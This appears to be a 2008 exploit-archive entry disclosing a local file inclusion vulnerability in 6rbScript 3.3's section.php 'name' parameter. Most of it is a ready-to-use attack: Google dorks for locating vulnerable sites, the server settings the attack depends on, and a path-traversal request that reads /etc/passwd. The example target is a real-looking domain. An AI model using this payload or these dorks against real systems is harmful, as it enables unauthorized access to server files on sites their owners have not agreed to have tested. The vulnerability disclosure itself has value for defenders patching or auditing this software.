[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability
# Published : 2008-09-21
# Author : Stack
# Previous Title : PHP iCalendar <= 2.24 (cookie_language) LFI / File Upload Exploit
# Next Title : Rianxosencabos CMS 0.9 Insecure Cookie Handling Vulnerability
|___________________________________________________|
|
| 6rbScript V3.3 Local file Vulnerability
|
|___________________________________________________
| |
|
| script : www.6rbscript.com
|
| DorK : inurl:"section.php?name=singers"
| dorK : Powered By 6rbScript V3.3
|___________________________________________________|
Author : Stack
Expl need magic quote = off & open basdir = off in many server
site.il/section.php?name=../../../../etc/passwd
# www.Syue.com [2008-09-21]